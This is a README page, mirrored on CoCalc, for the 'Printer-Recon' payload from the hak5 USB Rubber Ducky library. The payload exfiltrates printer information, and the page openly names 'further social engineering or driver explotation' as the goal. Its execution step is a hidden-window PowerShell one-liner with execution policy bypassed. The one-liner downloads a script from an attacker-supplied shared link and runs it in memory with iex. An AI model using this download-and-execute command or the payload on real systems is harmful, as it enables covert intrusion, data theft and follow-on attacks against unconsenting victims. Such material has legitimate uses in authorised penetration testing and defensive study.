Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
hak5
GitHub Repository: hak5/usbrubberducky-payloads
Path: blob/master/payloads/library/exfiltration/Printer-Recon/README.md
2968 views

Printer-Recon

Description

This payload is meant to exfiltrate printer information for further social engineering or driver explotation. Can also be used to find printer web interfaces on the network

Getting Started

Dependencies

  • DropBox or other file sharing service - Your Shared link for the intended file

  • Windows 10

Executing program

  • Plug in your device

  • Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory

powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl

Contributing

All contributors names will be listed here

atomiczsec

I am Jakoby

Version History

  • 0.1

    • Initial Release

Contact

📱 My Socials 📱

C#
YouTube
Python
Twitter
Jsonnet
I-Am-Jakoby's Discord

Acknowledgments